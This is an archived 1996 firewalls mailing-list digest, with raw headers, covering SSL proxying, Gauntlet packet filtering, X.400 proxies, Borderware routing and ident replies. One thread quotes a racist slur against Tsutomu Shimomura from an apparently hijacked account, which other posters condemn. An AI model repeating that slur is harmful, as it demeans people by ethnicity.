In-reply-to: Your message of "Mon, 12 Feb 1996 14:40:35 EST." <01BAF958.19AB3980@SPERFNET.cscmicro.com>
Date: Mon, 12 Feb 1996 23:26:19 +0200
From: "Angelos D. Keromytis"

In message <01BAF958.19AB3980@SPERFNET.cscmicro.com>, Shoel Perelman writes:
>I have been using FWTK to proxy http, but now I realize that users want
>to access shttp pages.
>Are there any "free" solutions like fwtk to do
>this? I tried using plug-gw from fwtk to do this on port 443, but it
>doesn't seem to work. Has anybody successfully configured a shttp proxy?
>If so, what package did you use? A "net" or "free" solution is what
>I'm really looking for here...
>

Are you referring to SHTTP or SSL (HTTPS) pages? We (SOS Corporation) are in the final stages of testing of a product that does proxy-SSL on behalf of clients that don't talk SSL natively; if your browsers DO talk SSL (like Netscape Navigator), you can always use the CERN httpd with the SSL-proxy patch by Ari Luotonen which allows your browsers to talk SSL with the remote servers directly. SHTTP is another matter altogether; there are plans to add support for it to the proxy WWW server, but not in the very near future.

Regards,
-Angelos
SOS Corporation

From firewalls-owner Mon Feb 12 13:45:12 1996
From: Michael Brown
To: firewalllist
Subject: Dead End Concepts-Encryption
Date: Mon, 12 Feb 96 15:10:00 CST
Message-Id: <311FAD16@mnbp.network.com>

> Further corporations and big users do not need to encrypt individual files
> for the most part, they need to encrypt channels (to avoid volume analysis)
> between their sites and the entire notebook/computer, not some files.
> Heck,
> corporate users have trouble understanding when to run and not to run
> macros in WORD documents and you expect them to be diligent about what
> files to encrypt before mailing ?
>
> Just as we had to move protection from the workstation/node level to the
> network/subnet (e.g. firewalls), transaction protection must also be moved.
> I am seeing a lot of whole keys on blue backgrounds these days...
>
> Warmly,
> Padgett

If you can convince Users to encrypt files, you are a pretty good salestype. But they do not continue to follow by the rules. They start slacking and then get pissed because "it takes too long", and "do we really need to do this". If you need to keep things safe, you have to address it at the network level. Encrypt everything or set rules to auto encrypt over the Frame Relay nets, internet, any public telco based network. And if you're serious about security stay away from that 40 bit junk. Go above DES too. Go to TripleDES (112 bit) or IDEA (128 bit). This is the good stuff regulated by UnkEL Sam.
mkb From firewalls-owner Mon Feb 12 14:24:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04343 for firewalls-outgoing; Mon, 12 Feb 1996 14:22:10 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04309 for ; Mon, 12 Feb 1996 14:21:54 -0800 (PST) Received: by gauntlet-1.trusted.com; id RAA21837; Mon, 12 Feb 1996 17:28:29 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma021817; Mon, 12 Feb 96 17:28:09 -0500 Received: from vanidor.trusted.com by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA00900; Mon, 12 Feb 96 17:19:50 -0500 Message-Id: <2.2.16.19960212221655.4d1f5028@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 17:16:55 -0500 To: sengle@hti.net (Steven W. Engle), firewalls@GreatCircle.COM From: Frederick M Avolio Subject: Re: Gauntlet 3.1 Packet Filter? Cc: sengle@hti.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:00 PM 2/12/96 -0600, Steven W. Engle wrote: >Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny >source / destination)? Or it is purely a application level proxy services >approach? It is an application gateway, as you suggest, and purely that, but it does uses rules based on many things including source and destination. >If I have IP traffic for which there is no proxy for, how can I control >this traffic without writing a custom proxy? The quick answer people will give is to use the Plug Gateway, but I'd rather you thought about the service a bit first and decided that it was secure to allow through a firewall. Writing customer proxies may be very easy or difficult. It depends on the protocol and how well-defined it is (mostly). 
Using other proxies as the basis for this sometimes makes this easier to do. (Source code is provided.) > >If it does packet-filter, how (well) are the proxy "rules" integrated with >the packet-filtering "rules"? > >I checked out the TIS web sight and could not find any specific statments >toward "yes, it packet filters". No, it does not packet filter. I'm hoping you looked at the functional summary there. You can find it at http://www.tis.com/docs/Products/g31fdh.html Fred > >-- >Steve Engle >DHT, Inc. >sengle@hti.net > > > From firewalls-owner Mon Feb 12 14:39:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04533 for firewalls-outgoing; Mon, 12 Feb 1996 14:24:02 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04513 for ; Mon, 12 Feb 1996 14:23:53 -0800 (PST) Received: by gauntlet-1.trusted.com; id RAA21879; Mon, 12 Feb 1996 17:30:29 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma021873; Mon, 12 Feb 96 17:30:07 -0500 Received: from vanidor.trusted.com by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA00930; Mon, 12 Feb 96 17:21:48 -0500 Message-Id: <2.2.16.19960212221853.13d714ca@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 17:18:53 -0500 To: Shoel Perelman , "'firewalls@greatcircle.com'" From: Frederick M Avolio Subject: Re: SHTTP/SSL Proxies? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recommend asking on the FWTK mailing list for this. Plug works, and there will be other options in the next release, being discussed there. Fred At 02:40 PM 2/12/96 -0500, Shoel Perelman wrote: >I have been using FWTK to proxy http, but now I realize that users want to access shttp pages. 
>Are there any "free" solutions like fwtk to do this? I tried using plug-gw from fwtk to do this on port 443, but it doesn't seem to work. Has anybody successfully configured a shttp proxy? If so, what package did you use? A "net" or "free" solution is what I'm really looking for here...
>
>Thanks in advance..
>
>-Shoel Perelman
>sdp4198@is2.nyu.edu
>
>

From firewalls-owner Mon Feb 12 14:54:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04971 for firewalls-outgoing; Mon, 12 Feb 1996 14:33:58 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.235.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04966 for ; Mon, 12 Feb 1996 14:33:54 -0800 (PST)
Received: (karyn@localhost) by diablo.cisco.com (8.6.10/CISCO.SERVER.1.1) id OAA14492 for firewalls@greatcircle.com; Mon, 12 Feb 1996 14:33:46 -0800
From: Karyn Pichnarczyk
Message-Id: <199602122233.OAA14492@diablo.cisco.com>
Subject: the Brosl Hasslacher thing
To: firewalls@greatcircle.com
Date: Mon, 12 Feb 1996 14:33:46 -0800 (PST)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Want to see what was done? check out:

http://takedown.com/evidence/anklebiters/

Let's get back to firewalls stuff.
karyn

From firewalls-owner Mon Feb 12 15:24:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05248 for firewalls-outgoing; Mon, 12 Feb 1996 14:41:06 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05220 for ; Mon, 12 Feb 1996 14:40:34 -0800 (PST)
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09953; Mon, 12 Feb 96 16:42:06 CST
Received: by mnbp.network.com with Microsoft Mail id <311FC110@mnbp.network.com>; Mon, 12 Feb 96 16:37:04 CST
From: Michael Brown
To: firewalllist , steveengle
Subject: RE: Gauntlet 3.1 Packet Filter?
Date: Mon, 12 Feb 96 16:36:00 CST
Message-Id: <311FC110@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You're looking for the NSC equipment, i.e. BorderGuard. check out www.network.com and look at security stuff.

_____________________________________________________
Subject: Gauntlet 3.1 Packet Filter?
Date: Monday, February 12, 1996 2:00PM

Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny source / destination)? Or is it purely an application level proxy services approach?

If I have IP traffic for which there is no proxy, how can I control this traffic without writing a custom proxy?

If it does packet-filter, how (well) are the proxy "rules" integrated with the packet-filtering "rules"?

I checked out the TIS web site and could not find any specific statements toward "yes, it packet filters".

--
Steve Engle
DHT, Inc.
sengle@hti.net

From firewalls-owner Mon Feb 12 15:46:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA07234 for firewalls-outgoing; Mon, 12 Feb 1996 15:22:35 -0800 (PST)
Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA07223 for ; Mon, 12 Feb 1996 15:22:27 -0800 (PST)
Message-ID: <9602121821.AA14495@databus.databus.com>
Date: Mon, 12 Feb 96 18:21 EST
From: Barney Wolff
To: firewalls@GreatCircle.com
Subject: Re: Hoo Dat and sniffer log
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Date: Sun, 11 Feb 1996 14:10:49 -0500 (EST)
>From: Sick Puppy
>
>Others: Please don't tell me these guys are trying to just send
>mail. They just happened to be hitting port 25 at that time.

Looks to me as though 203.241.159.180 (which is something in Samsung) thinks *you're* trying to send mail. Perhaps somebody sent them a tcp.syn with your (spoofed) IP address. In any case, your resets are not getting to them, so they re-transmit their syn/ack. Traceroute works from me to that address, so why aren't your resets getting through?

What's arcane about sniffing with a real Sniffer(tm)?

Barney Wolff

From firewalls-owner Mon Feb 12 15:54:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA07218 for firewalls-outgoing; Mon, 12 Feb 1996 15:22:21 -0800 (PST)
Received: from perki.connect.com.au (perki.connect.com.au [192.189.54.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA07201 for ; Mon, 12 Feb 1996 15:21:49 -0800 (PST)
Received: (from Utronic@localhost) by perki.connect.com.au id KAA25628 (8.6.12/IDA-1.6 for firewalls@GreatCircle.COM); Tue, 13 Feb 1996 10:20:34 +1100
>Received: from mecx05.colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA28218; Tue, 13 Feb 96 09:05:45 EST
Received: from cnw06 by perki; Tue, 13 Feb 1996 10:20 EST
Received: from mecx05.colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA28218; Tue, 13 Feb 96 09:05:45 EST
Received: from meei91 (meei97) by mecx05.colesmyer.com.au (5.0/SMI-4.1) id AA14669; Tue, 13 Feb 1996 08:45:52 +1100
Message-Id: <311FC6D9.1601@mecx05.colesmyer.com.au>
Date: Tue, 13 Feb 1996 09:01:45 +1000
From: Graham Jose
Organization: Coles Myer Limited
X-Mailer: Mozilla 2.0b6a (WinNT; I)
Mime-Version: 1.0
To: "firewalls@GreatCircle.COM"
Subject: Firewall-1 Version Comparison
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Has anybody had experience with both version 1 and 2 of the Firewall-1 software? I am interested in a functional comparison of the versions, and also in knowing whether there are other corporate sites currently using version 2.
Thanks,

Graham

--
Graham Jose, Technical Analyst, Information Systems Security
Retail Technology Services, Coles Myer Limited (Australia)
Voice: +613 9483 7613
Email: gjose@mecx05.colesmyer.com.au

From firewalls-owner Mon Feb 12 16:54:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11349 for firewalls-outgoing; Mon, 12 Feb 1996 16:48:41 -0800 (PST)
Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11335 for ; Mon, 12 Feb 1996 16:48:05 -0800 (PST)
Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA14201 (5.67a/IDA-1.5 for ); Tue, 13 Feb 1996 08:47:38 +0800
Received: by bass.bass.com.my (4.1/SMI-4.1) id AA06654; Tue, 13 Feb 96 08:42:42 MYT
Date: Tue, 13 Feb 1996 08:42:19 +0800 (MYT)
From: Tham Huei Hwan
To: firewalls
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Mon Feb 12 19:54:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA17722 for firewalls-outgoing; Mon, 12 Feb 1996 19:52:41 -0800 (PST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA17717 for ; Mon, 12 Feb 1996 19:52:36 -0800 (PST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA22724; Mon, 12 Feb 1996 22:48:52 -0500
Date: Mon, 12 Feb 1996 22:48:47 -0500 (EST)
From: Rabid Wombat
To: Oliver Friedrichs
cc: Kent Dahlgren , Brosl Hasslacher , firewalls@GreatCircle.COM
Subject: Re: your mail
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Yeah, but I'm sure the little prick is lurkin' on the list on some stolen account, so he'll see it anyway.
From what I heard, the Brosl account is on a "jail" system, so Brosl may or may not be a real person - my apologies to Brosl if sie is.

----------------------------------------
Rabid Wombat wombat@mcfeely.bsfs.org
----------------------------------------

On Mon, 12 Feb 1996, Oliver Friedrichs wrote:

>
> You realize this was posted from a hacked account right ?
>
>
> On Mon, 12 Feb 1996, Kent Dahlgren wrote:
>
> >
> >
> > On Sat, 10 Feb 1996, Brosl Hasslacher wrote:
> >
> > > It seems that once again, that slanty-eyed chink Tsutomu has made another
> > > dollar at the expense of a hacker, Kevin Mitnick.
> > >
> >
> > "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes
> > down the sewer....at least in my eyes. And I'm a good ol white boy from
> > the Pacific Northwest. Lame lame lame lame.....
> >
> >
> > "Any ideas expressed here may not reflect those of my employers"
> > ______________________________________________________________________________
> > ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
> > /
> > Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com
> > Fax: 1.503.685.3063 WWW: www.tek.com
> > BBS: 1.503.685.4504 E-World: Keyword Tektronix
> > HAL: 1.503.682.7450 AOL: Keyword Tektronix
> > Service: 1.800.835.6100 FTP: ftp.tek.com
> > ______________________________________________________________________________
> >
>
>

From firewalls-owner Mon Feb 12 23:24:48 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA25217 for firewalls-outgoing; Mon, 12 Feb 1996 23:11:04 -0800 (PST)
Received: from sol.acs.uwosh.edu (sol.acs.uwosh.edu [141.233.159.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA25211 for ; Mon, 12 Feb 1996 23:11:00 -0800 (PST)
Received: by sol.acs.uwosh.edu; id AA02177; 4.1/42.1.5; Tue, 13 Feb 96 01:08:28 CST
Received: from afya.acs.uwosh.edu(141.233.159.3) by sol.acs.uwosh.edu via smap (V1.3) id sma002173; Tue Feb 13 01:08:09 1996
Received: by afya.acs.uwosh.edu (4.1) id AA22999; Tue, 13 Feb 96 01:08:05 CST
Message-Id: <9602130708.AA22999@afya.acs.uwosh.edu>
To: firewalls@greatcircle.com
Subject: Isolated box...
Date: Tue, 13 Feb 1996 01:08:04 -0600
From: "Brian T. Wightman"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

This may not be entirely relevant for firewalls, but I think it is close, so...

I have an opportunity to get a couple of old Sun IPCs to use to provide services such as RARP, bootp/dhcp, bootparams, etc as well as some network listening. RARP under SunOS 4.1.n needs the /dev/nit device, which I do not want to put on an "open" machine.

Would stripping all services from /etc/inetd, stopping nfs, NIS, etc, basically only allowing console logins, and only supporting sendmail going out, ftp going out, pulling unneeded devices/filesystem types/etc out of the kernel, etc be sufficient protection for this box, or are there some other parameters that would need to be tweaked either in the kernel at run time or in some header files?

Basically I would like to lock that /dev/nit device into a controlled environment. It would be a pain in the butt to administer, but it should not require much in the way of maintenance.

Brian T.
Wightman
wightman@sol.acs.uwosh.edu
Academic Computing, UW Oshkosh
wightman@oshkoshw.bitnet
800 Algoma Blvd, Dempsey Hall 307
http://www.uwosh.edu/faculty_staff/wightman
Oshkosh, Wisconsin 54901
Phone: (414) 424-3020

From firewalls-owner Tue Feb 13 02:55:07 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA03253 for firewalls-outgoing; Tue, 13 Feb 1996 02:43:47 -0800 (PST)
Received: from godel2.bim.be (godel2.bim.be [141.253.4.135]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA03234 for ; Tue, 13 Feb 1996 02:43:30 -0800 (PST)
Received: from dvorak.bim.be.bim.be by godel2.bim.be (SMI-8.6/SMI-SVR4) id LAA01921; Tue, 13 Feb 1996 11:44:45 +0100
Date: Tue, 13 Feb 1996 11:44:45 +0100
From: pc@bim.be (Philippe Cayphas)
Message-Id: <199602131044.LAA01921@godel2.bim.be>
To: firewalls@greatcircle.com
Subject: Proxy for X.400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I'm searching for an X.400 proxy running on a firewall. Has someone already seen that? Or may be implemented it using, for example, plug-gw?

Thank you.

Philippe

--
Ph. Cayphas
Senior Engineer
E-Mail: pc@bim.be
Telephone: +32(10)47.08.32
Fax : +32(10)47.08.11
Postal Mail : Ph. Cayphas
BIM sa
4, Av. Albert Einstein
1348 Louvain-La-Neuve
Belgium

From firewalls-owner Tue Feb 13 03:24:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04054 for firewalls-outgoing; Tue, 13 Feb 1996 03:17:13 -0800 (PST)
Received: from mail.Germany.EU.net (mail.germany.eu.net [192.76.144.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04049 for ; Tue, 13 Feb 1996 03:16:55 -0800 (PST)
Received: by mail.Germany.EU.net with SMTP (5.59:15/EUnetD-2.5.3.d) via EUnet id MAA14220; Tue, 13 Feb 1996 12:16:13 +0100
Received: from mail.tntm by white.telenet.de id aa16103; 13 Feb 96 12:16 MEZ
Received: from cc:Mail by mail.muc.telenet.de id AA824242369; Tue, 13 Feb 96 12:11:10 CET
Date: Tue, 13 Feb 96 12:11:10 CET
From: "Schlüter, Olaf"
Message-Id: <9601138242.AA824242369@mail.muc.telenet.de>
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From: Frederick M Avolio
Date: Mon, 12 Feb 1996 17:16:55 -0500
Subject: Re: Gauntlet 3.1 Packet Filter?

At 02:00 PM 2/12/96 -0600, Steven W. Engle wrote:
>Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny
>source / destination)? Or is it purely an application level proxy services
>approach?

It is an application gateway, as you suggest, and purely that, but it does use rules based on many things including source and destination.

>I checked out the TIS web site and could not find any specific statements
>toward "yes, it packet filters".

No, it does not packet filter.

So what about the ipfs(8) utility, which lets you configure rules for denying, forwarding and absorbing (i.e. forwarding packets destined to the outside to the application layer proxies)? Looks pretty well like a packet filter.
Regards,

Olaf Schlueter, Telenet GmbH, Munich, Germany

From firewalls-owner Tue Feb 13 03:39:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04449 for firewalls-outgoing; Tue, 13 Feb 1996 03:28:31 -0800 (PST)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04444 for ; Tue, 13 Feb 1996 03:28:27 -0800 (PST)
Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA22132; Tue, 13 Feb 1996 06:27:38 -0500
Received: from mojo.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA25120; Tue, 13 Feb 1996 11:27:35 GMT
Received: by mojo.europe.dg.com (5.4R3.10/dg-gens08) id AA00343; Tue, 13 Feb 1996 11:27:25 GMT
Message-Id: <9602131127.AA00343@mojo.europe.dg.com>
Subject: Firewall comparison chart???
To: firewalls@greatcircle.com
Date: Tue, 13 Feb 96 11:27:25 GMT
From: Phil Davidson
X-Mailer: ELM [version 2.3 PL11]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just wondering if anyone has seen a chart that compares the various Firewall packages currently available. The kind that lists which features are available or not for the different packages.
cheers

Phil

From firewalls-owner Tue Feb 13 04:24:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA06288 for firewalls-outgoing; Tue, 13 Feb 1996 04:12:49 -0800 (PST)
Received: from close.demon.co.uk (close.demon.co.uk [158.152.8.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA06283 for ; Tue, 13 Feb 1996 04:12:15 -0800 (PST)
Received: (from smap@localhost) by close.demon.co.uk (8.6.12/8.6.9) id KAA12561; Tue, 13 Feb 1996 10:01:30 GMT
Message-Id: <199602131001.KAA12561@close.demon.co.uk>
Received: from shut.ticl.co.uk(193.32.1.3) by gate.ticl.co.uk via smap (V1.3) id sma012557; Tue Feb 13 10:01:25 1996
Date: Tue, 13 Feb 96 11:03:15 0000
From: Peter Curran
MIME-Version: 1.0
To: Kevin Steves
CC: firewalls@greatcircle.com
Subject: RE: Web browser ports?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> In Chapter 14 of TCP/IP Illustrated Volume 3

Volume 3 of Stevens? What is this one about, has it been out for long?

Peter

From firewalls-owner Tue Feb 13 06:14:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA10154 for firewalls-outgoing; Tue, 13 Feb 1996 06:02:38 -0800 (PST)
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA10136; Tue, 13 Feb 1996 06:02:24 -0800 (PST)
Message-Id: <199602131402.GAA10136@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA120160094; Tue, 13 Feb 1996 09:01:34 -0500
Date: Tue, 13 Feb 1996 09:01:34 -0500
From: gary flynn
To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM
Subject: Re: Dead End Concepts-Encryption
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> > Just as we had to move protection from the workstation/node level to the
> network/subnet (e.g. firewalls), transaction protection must also be moved.
> I am seeing a lot of whole keys on blue backgrounds these days...
>

Then again, one could argue that encryption puts the onus back on the node where the encryption takes place and lets the network do what it does best...communicate.

One could also argue that a firewall is nothing more than a restrictive node in the communications path. (No, a router doesn't fit this definition. The firewall has application knowledge and, sometimes, user interaction.)

The firewall concept's main weakness is it assumes there is a trusted and untrusted side. Reality is rarely this simple.

True, because of the insecure nature of some of today's services (whether by poor design or misconfiguration), firewalls are necessary. But I'd think that node to node encryption combined with strong authentication (i.e. good passwords) would take care of most technologically related security problems. The main challenge is ensuring that the node can't communicate without these functions.

Gary Flynn
James Madison University
Security Neophyte

From firewalls-owner Tue Feb 13 07:00:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA10679 for firewalls-outgoing; Tue, 13 Feb 1996 06:34:42 -0800 (PST)
Received: from WVLINK.MPL.COM (WVLINK.MPL.COM [198.77.4.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA10665 for ; Tue, 13 Feb 1996 06:34:36 -0800 (PST)
Date: Tue, 13 Feb 1996 06:34:36 -0800 (PST)
Message-Id: <199602131434.GAA10665@miles.greatcircle.com>
Received: from pc-1 by WVLINK.MPL.COM (MX V4.0 VAX) with SMTP; Tue, 13 Feb 1996 09:34:21 EST
X-Sender: jim@wvlink.mpl.com
X-Mailer: Windows Eudora Version 2.0.3
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: jim@wvlink.mpl.com (Jim Poling)
Subject: Problems with Borderware without internet
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am trying to get V3.0.1 of Borderware's Firewall to work on a large network, that has no
access to the internet. Basically the internal/protected side has many many machines, routers, DNS's, but the external/unprotected side would just have a Terminal Server with dialup modems.

Borderware asks for the external/internal IP address, the netmask, and the connection type (10base-T), and then an external router. As you can see from my description above I don't have an external router, just the terminal server. I go ahead and give the I/P number of the Terminal Server as the external router, and from the firewall I can ping the terminal server on the external side, and I can ping a VAX on the internal side. I can ping the internal side of the FW from the VAX on the internal network. I can ping the external side of the FW from the terminal server on external network. But I can't ping the internal side from the external side with the terminal server, and I can't ping the external side from the internal side with the VAX on the secure network.

I don't have anything fancy setup on it, no DNS, no static routes defined. I'm not where I can get a show routes right now, but I do remember there was a 127.0.0.1 -> 127.0.0.1 that puzzled me, since there was a 127.0.0.1 for both internal and external networks.

Thanks,

-Jim Poling
MPL Corp.
Buckhannon, WV
JIM@WVLINK.MPL.COM
(304)472-9520

From firewalls-owner Tue Feb 13 07:01:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA11039 for firewalls-outgoing; Tue, 13 Feb 1996 06:51:48 -0800 (PST)
Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA11024 for ; Tue, 13 Feb 1996 06:51:35 -0800 (PST)
Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA21506; Tue, 13 Feb 96 14:50:35 GMT
Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma021501; Tue Feb 13 14:50:11 1996
Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA14673; Tue, 13 Feb 96 14:50:08 GMT
From: nreadwin@london.micrognosis.com (Neil Readwin)
Message-Id: <9602131450.AA14673@zeus.london.micrognosis.com>
Subject: Re: port 113?
To: firewalls@greatcircle.com
Date: Tue, 13 Feb 1996 14:50:08 +0000 (GMT)
In-Reply-To: from "Mark Lentczner" at Feb 12, 96 09:12:07 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> echo $QUERY:OTHER:bob

IMHO it would be closer to the spirit of the RFC to do

    echo $QUERY : ERROR : UNKNOWN-ERROR

or at least

    echo $QUERY : USERID : OTHER : bob

--
E-mail: nreadwin@micrognosis.co.uk
BOFH-mail: nreadwin@dot.dot

From firewalls-owner Tue Feb 13 08:46:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13658 for firewalls-outgoing; Tue, 13 Feb 1996 08:39:14 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13653 for ; Tue, 13 Feb 1996 08:39:10 -0800 (PST)
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA20197; Tue, 13 Feb 96 10:41:22 CST
Received: by mnbp.network.com with Microsoft Mail id <3120BE02@mnbp.network.com>; Tue, 13 Feb 96 10:36:18 CST
From: Michael Brown
To: firewalllist
Subject: RE: Firewall comparison chart???
Date: Tue, 13 Feb 96 10:35:00 CST
Message-Id: <3120BE02@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Here's a starting point

www.access.digex.net/~bdboyle/firewall.vendor.html

some is wrong and a few products have more capabilities, however all the web pages are listed so you can visit each one for the latest info.

mkb
www.network.com

----------
Just wondering if anyone has seen a chart that compares the various Firewall packages currently available. The kind that lists which features are available or not for the different packages.

cheers

Phil

From firewalls-owner Tue Feb 13 11:22:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA16680 for firewalls-outgoing; Tue, 13 Feb 1996 11:08:19 -0800 (PST)
Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA16675 for ; Tue, 13 Feb 1996 11:08:16 -0800 (PST)
Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id NAA06602 for ; Tue, 13 Feb 1996 13:07:37 -0600 (CST)
From: Doug Hughes
Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id NAA22780; Tue, 13 Feb 1996 13:07:33 -0600
Date: Tue, 13 Feb 1996 13:07:33 -0600
Subject: Re: Firewall comparison chart???
To: firewalls@greatcircle.com
Message-Id:
In-Reply-To: <9602131127.AA00343@mojo.europe.dg.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

